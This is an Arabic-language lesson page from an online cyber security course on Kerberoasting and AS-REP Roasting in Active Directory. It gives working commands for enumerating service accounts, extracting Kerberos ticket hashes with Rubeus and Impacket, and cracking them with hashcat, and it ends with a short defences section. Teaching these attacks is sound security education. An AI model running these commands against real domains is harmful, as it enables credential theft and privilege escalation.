0Pricing
Cyber Security Academy · درس

Kerberoasting وAS-REP Roasting

اطلب تذاكر خدمات Kerberos، واكسرها دون اتصال باستخدام Hashcat.

Kerberoasting وAS-REP Roasting درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 3 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

تشفير تذاكر Kerberos

تُشفّر تذاكر الخدمة باستخدام تجزئة كلمة مرور حساب الخدمة. يستطيع أي مستخدم في النطاق طلب تذكرة خدمة لأي SPN. وإذا كان حساب الخدمة يستخدم كلمة مرور ضعيفة، فيمكن كسر التذكرة دون اتصال.

ما هجوم Kerberoasting؟

يطلب Kerberoasting تذاكر خدمة للحسابات التي تحتوي على أسماء أساسيّات الخدمة (SPNs)، ثم يستخرج التذكرة المشفّرة ويكسرها دون اتصال باستخدام Hashcat. ولا يتطلب ذلك امتيازات مرتفعة — إذ يستطيع أي مستخدم في النطاق تنفيذه.

# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with Hashcat

العثور على SPNs

احصر جميع حسابات الخدمة التي تحتوي على SPNs باستخدام PowerView أو Impacket أو أدوات AD الأصلية. تربط SPNs حسابات الخدمة بالخدمات التي تقدمها.

# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com

# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
  "(servicePrincipalName=*)" cn servicePrincipalName

طلب التذاكر واستخراجها

يطلب كل من Rubeus (على Windows) وGetUserSPNs من Impacket (على Linux) التذاكر ويخرجانها بتنسيق قابل للكسر.

# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
  -request -outputfile hashes.txt

الكسر باستخدام Hashcat

تستخدم تجزئات Kerberoast الوضع 13100 (Kerberos 5 TGS-REP). استخدم قائمة كلمات قوية مع قواعد لتحقيق أقصى فعالية.

# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule

# AES tickets: mode 19700 (AES128) or 19800 (AES256)

ما هجوم AS-REP Roasting؟

يستهدف AS-REP Roasting الحسابات المفعّل فيها عدم اشتراط المصادقة المسبقة لـ Kerberos. يعيد AS تذكرة TGT مشفّرة باستخدام تجزئة المستخدم — ويمكن طلبها دون معرفة كلمة المرور وكسرها دون اتصال.

العثور على الحسابات التي عطّلت المصادقة المسبقة

تُعد الحسابات التي لا تتطلب المصادقة المسبقة إعدادًا خاطئًا، وغالبًا ما تتركها التطبيقات القديمة. احصرها باستخدام PowerView أو GetNPUsers.

# PowerView
Get-DomainUser -PreauthNotRequired

# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
  -dc-ip dc.corp.com -format hashcat -outputfile asrep.txt

# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txt

كسر تجزئات AS-REP

تستخدم تجزئات AS-REP وضع Hashcat رقم 18200. وتتم عملية الكسر بالطريقة نفسها المتبعة في Kerberoasting — أي هجوم قاموسي دون اتصال على استجابة AS المشفّرة.

# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule

تقييم الأثر

غالبًا ما تتمتع كلمات مرور حسابات الخدمة التي جرى كسرها بامتيازات مرتفعة — فقد تكون حسابات الخدمة التي تشغّل قواعد البيانات أو برامج النسخ الاحتياطي أو Exchange مسؤولي نطاق. وغالبًا ما تُهمَل حسابات AS-REP وتكون حمايتها ضعيفة.

Kerberoasting موجّه

إذا كان لديك وصول للكتابة إلى كائن، فيمكنك إضافة SPN مؤقتًا إلى حساب عالي القيمة، وتنفيذ Kerberoasting عليه، وكسر التجزئة، ثم إزالة SPN — مما يتيح استهداف حسابات محددة عند الطلب.

وسائل الحماية

للحماية من Kerberoasting: استخدم كلمات مرور عشوائية طويلة (25 حرفًا أو أكثر) لحسابات الخدمة، أو الأفضل من ذلك استخدم Group Managed Service Accounts (gMSA) التي تعتمد كلمات مرور بطول 120 حرفًا وتتولى تدويرها تلقائيًا. أما للحماية من AS-REP، ففعّل المصادقة المسبقة لجميع الحسابات.

تحقق سريع

ما سمة الحساب المطلوبة لكي ينجح AS-REP Roasting؟

ملخص: Kerberoasting وAS-REP Roasting

يستغل الهجومان نقاط ضعف تشفير تذاكر Kerberos لكسر كلمات المرور دون اتصال، من دون التسبب في عمليات قفل الحسابات. يستهدف Kerberoasting حسابات SPN (ويستطيع أي مستخدم في النطاق تنفيذه)، بينما يستهدف AS-REP Roasting الحسابات التي لا تستخدم المصادقة المسبقة (ولا يتطلب بيانات اعتماد). استخدم gMSA لحسابات الخدمة، وفرض المصادقة المسبقة على جميع المستخدمين للحماية.

الأسئلة الشائعة

هل درس «Kerberoasting وAS-REP Roasting» مجاني؟

نعم — نص درس «Kerberoasting وAS-REP Roasting» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ماذا ستتعلم في «Kerberoasting وAS-REP Roasting»؟

اطلب تذاكر خدمات Kerberos، واكسرها دون اتصال باستخدام Hashcat. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟

لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 3 من أصل 4.

كم من الوقت يستغرق درس «Kerberoasting وAS-REP Roasting»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟

نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. مصادقة Windows: NTLM وKerberos
  2. هجمات Pass-the-Hash وPass-the-Ticket
  3. Kerberoasting وAS-REP Roasting
  4. تحصين Active Directory
← العودة إلى Cyber Security Academy